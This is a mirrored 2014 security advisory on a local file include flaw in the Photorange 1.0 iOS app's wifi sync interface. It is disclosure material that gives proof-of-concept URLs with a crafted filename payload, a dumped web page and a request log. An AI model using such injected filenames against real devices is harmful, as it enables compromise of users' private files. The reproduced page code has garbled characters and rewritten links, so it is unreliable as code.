Photorange 1.0 iOS – Local File Inclusion

Exploit Database
110 阅读

作者： Vulnerability-Lab

日期： 2014-09-11
类别：
- webapps
平台：
- ios
来源：https://www.exploit-db.com/exploits/34626/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443

444

445

446

447

448

449

450

451

452

453

454

455

456

457

458

459

460

Document Title:

===============

Photorange v1.0 iOS - File Include Web Vulnerability

References (Source):

====================

http://www.vulnerability-lab.com/get_content.php?id=1318

Release Date:

=============

2014-09-07

Vulnerability Laboratory ID (VL-ID):

====================================

1318

Common Vulnerability Scoring System:

====================================

6.3

Product & Service Introduction:

===============================

The BEST and MOST Convenient Private Photo & Video & Docs App! Photorange provides a secure Password System to keep your

secret files 100% private. Your files are ONLY stored on your device and we can never touch them.

( Copy of the Vendor Homepage: https://itunes.apple.com/en/app/photorange-schutz-privat-foto/id896041290 )

Abstract Advisory Information:

==============================

The Vulnerability Laboratory discovered a local file include web vulnerability in the official Photorange v1.0 iOS mobile web-application.

Vulnerability Disclosure Timeline:

==================================

2014-09-08: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

=================

Published

Affected Product(s):

====================

Jiajun Kuang

Product: Photorange - iOS Mobile Web Application 1.0

Exploitation Technique:

=======================

Local

Severity Level:

===============

High

Technical Details & Description:

================================

A local file include web vulnerability has been discovered in the official Photorange v1.0 iOS mobile web-application.

The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or

system specific path commands to compromise the mobile web-application.

The web vulnerability is located in the <code>filename</code> value of the <code>add file</code> module. Remote attackers are able to inject own files with

malicious <code>filename</code> values in the <code>sync</code> device POST method request to compromise the mobile web-application. The local file/path include

execution occcurs in the file dir index web interface through the download path next to the vulnerable name/path value. The attacker is able

to inject the local file request by usage of the available <code>wifi interface</code> for file exchange via sync.

Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute

different local malicious attack requests. The attack vector is on the application-side of the wifi service and the request method to

inject is POST via Sync.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)

count of 6.3. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low

user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected

device component compromise.

Request Method(s):

[+] [Sync] [POST]

Vulnerable Parameter(s):

[+] filename

Affected Module(s):

[+] Index File Dir Listing (Web Interface - http://localhost:9900/ )

Proof of Concept (PoC):

=======================

The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.

For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: Exploit

http://localhost:9900/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT

http://localhost:9900/Download/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT

PoC: Web Interface - Index Dir Listing

<title>WiFi web access</title>

</head><body><fontbase family="Arial,Verdana">

a, div{

font-family: Arial,Verdana;

}

body {

background-color: silver;

position: relative;

height: 100%;

}

hr {

height: 1px;

border: none;

border-top: 1px solid #DDDDDD;

}

#content {

background-color: white;

border-style: dashed;

border-color: silver;

border-width: 1px;

position: absolute;

width: 98%;

left: 10px;

top: 10px;

z-index: 333;

}

.aImg {

margin-left: 10px;

margin-right: 10px;

margin-top: 20px;

border:none;

}

/*.aFod {

color: GrayText;

text-decoration: none;

width: 50px;

height: 50px;

}*/

#progress-bar-background {

width: 100%;

height: 100%;

/*background:silver url('/Web/left.ico') no-repeat;*/

background: silver;

position: absolute;

top:0;

pointer-events:none;

cursor: pointer;

}

#file-uploader-text {

width: 155px;

height: 30px;

text-align: center;

line-height: 30px;

cursor: pointer;

}

#file-uploader {

width: 155px;

height: 30px;

left: 18px;

position: absolute;

top: 0;

opacity: 0;

filter: alpha(opacity=0);

cursor: pointer;

}

#progress-bar-value {

width: 0%;

height: 100%;

background: #2B90D3;

}

.btnText {

width: 155px;

height: 30px;

text-align: center;

line-height: 30px;

cursor: pointer;

font-size: 13px;

text-align: center;

color: white;

}

#submit-link {

display: none;

position: absolute;

top: 7px;

left: 200px;

}

#stop-uploading-link {

display: none;

position: absolute;

top: 7px;

left: 200px;

}

</style>

var currentFolderPath = '/';

var alertMessage = "null";

var actionType = "Show";

var submitting = false;

var tipHiddenTop = -200;

var tipShownTop = -80;

var lastShownTipDate;

if (alertMessage != "null") {

alert(alertMessage);

}

function tippable() {

var currentTop = document.getElementById("tip").style.top;

currentTop = currentTop.substring(0, currentTop.length-2);

currentTop = Number(currentTop);

var not = ((currentTop > tipHiddenTop) && (currentTop < tipShownTop))

return !not;

}

function hideTip() {

var tip = document.getElementById("tip");

tip.style.top = tipHiddenTop;

}

function showTip() {

var tip = document.getElementById("tip");

tip.style.top = tipShownTop;

lastShownTipDate = new Date();

setTimeout("if((new Date()).getTime()-lastShownTipDate.getTime()>=4900){hideTip();}", 5000);

}

function aClickHandler(tag) {

if (submitting) {

return;

}

if (actionType == "Show")

{

if (tag.className == "image") {

document.body.style.overflow = "hidden"; //禁止body滚动

var wrap = document.getElementById("wrap");

wrap.style.display = "block";

var src = "https://www.exploit-db.com/" + actionType + tag.name;

wrap.innerHTML = "<iframe id='photo-viewer' src='https://www.exploit-db.com/exploits/34626/" + src + "' style='position:absolute;width:100%;height:100%' frameborder='no' scrolling='no' allowtransparency='yes' />";

}

else {

if (!tippable()) {

return;

}

document.getElementById("tip").style.top = tipHiddenTop;

document.getElementById("tip-content").innerHTML = "Jetzt kann nur Bild im Browser gesehen werden.";

showTip();

}

else {

var download = "/" + actionType + tag.name;

location.href = download;

}

function dClickHandler(tag) {

if (submitting) {

return;

}

location.href = tag.name;

}

function removePhotoViewer()

{

var wrap = document.getElementById("wrap");

wrap.innerHTML = "";

wrap.style.display = "none";

document.body.style.overflow = "auto";

}

function setViewMode()

{

var switchBg = document.getElementById("switch-bg");

var __switch = document.getElementById("switch");

switchBg.style.backgroundColor = "silver";

__switch.style.backgroundColor = "#2B90D3";

}

function setDownloadMode()

{

var switchBg = document.getElementById("switch-bg");

var __switch = document.getElementById("switch");

switchBg.style.backgroundColor = "#2B90D3";

__switch.style.backgroundColor = "silver";

}

function switchMode() {

if (!tippable()) {

return;

}

var ifInDownloadMode = (actionType == "Download");

actionType = ifInDownloadMode ? "Show" : "Download";

var ifInDownloadModeNow = !ifInDownloadMode;

if (ifInDownloadModeNow)

{

setDownloadMode();

document.getElementById("tip").style.top = tipHiddenTop;

document.getElementById("tip-content").innerHTML = "Tipp: anklickenirgend ein Daumennagel zum Herunterladen";

showTip();

}

else {

setViewMode();

hideTip();

}

$(document).ready(function () {

$("#file-upload").uploadify({

height: 30,

swf : '/Web/uploadify/uploadify.swf',

uploader: 'upload.html',

width : 120,

onQueueComplete : function(queueData) {

location.reload();

buttonText: "�berliefern",

onUploadStart : function(file) {

$.post("/setCurrent"+currentFolderPath, {}, function(data){}, "json");

$.post("/ifReachTheLimit/"+file.name, {}, function(data){ $("#file-upload").uploadify('stop'); }, "json");

}

});

document.getElementById("file-upload").style.left = "15px";

});

</script>

Tip: how to do

</div>

<a href="https://www.exploit-db.com/logout.html" style="float:right; margin:10px;">outloggen</a>

<h1 style="margin-left:10px; font-weight:lighter;">WiFi web access</h1>

<a href="https://www.exploit-db.com/back.html" style="text-decoration:none; position:absolute; top:0; left:0;"><img src="https://www.exploit-db.com/Web/back3.png" style="width:25px; height:25px; border:none; vertical-align:middle"> Oberverzeichnis [aktuell:/]</a>

herunterladen

durchlesen

</div>

</div>

<div style="height: 30px; width: 120px; left: 15px;" class="uploadify" id="file-upload"><object style="position: absolute; z-index: 1;" id="SWFUpload_0" type="application/x-shockwave-flash" data="/Web/uploadify/uploadify.swf" class="swfupload" height="30" width="120"><param name="wmode" value="transparent"><param name="movie" value="/Web/uploadify/uploadify.swf"><param name="quality" value="high"><param name="menu" value="false"><param name="allowScriptAccess" value="always"><param name="flashvars" value="movieName=SWFUpload_0&uploadURL=%2Fupload.html&useQueryString=false&requeueOnError=false&httpSuccess=&assumeSuccessTimeout=30�ms=&filePostName=Filedata&fileTypes=*.*&fileTypesDescription=All%20Files&fileSizeLimit=0&fileUploadLimit=0&fileQueueLimit=999&debugEnabled=false&buttonImageURL=%2F&buttonWidth=120&buttonHeight=30&buttonText=&buttonTextTopPadding=0&buttonTextLeftPadding=0&buttonTextStyle=color%3A%20%23000000%3B%20font-size%3A%2016pt%3B&buttonAction=-110&buttonDisabled=false&buttonCursor=-2"></object><div style="height: 30px; line-height: 30px; width: 120px;" class="uploadify-button " id="file-upload-button"><span class="uploadify-button-text">�berliefern</span></div></div><div class="uploadify-queue" id="file-upload-queue"></div>

<hr>

</div>

</div>

</body>

</html></iframe></div></a></div></fontbase></body></html>

--- PoC Session Logs [GET] ---

Status: 200[OK]

GET http://localhost:9900/Download/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT Load Flags[LOAD_DOCUMENT_URILOAD_INITIAL_DOCUMENT_URI] Gr��e des Inhalts[17] Mime Type[application/download]

Request Header:

Host[localhost:9900]

User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

Accept-Language[de,en-US;q=0.7,en;q=0.3]

Accept-Encoding[gzip, deflate]

Referer[http://localhost:9900/]

Connection[keep-alive]

Response Header:

Accept-Ranges[bytes]

Content-Length[17]

Content-Disposition[attachment; filename=%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT]

Content-Type[application/download]

Date[Sat, 06 Sep 2014 00:13:00 GMT]

Reference(s): Links

http://localhost:9900/

http://localhost:9900/Download/

Solution - Fix & Patch:

=======================

The vulnerability can be pactehd by a secure parse and encode of the vulnerable filename value on sync or upload.

Filter and restrict the input to prevent further executions. Encode also the output name value listing in the index file dir module.

Security Risk:

==============

The security risk of the local file include web vulnerability in the filename value of the mobile application is estimated as high.

Credits & Authors:

==================

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:

=========================

The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either

expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers

are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even

if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation

of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break

any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com

Contact:admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com

Section:dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com

Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to

electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by

Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website

is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact

(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

VULNERABILITY LABORATORY RESEARCH TEAM

DOMAIN: www.vulnerability-lab.com

CONTACT: research@vulnerability-lab.com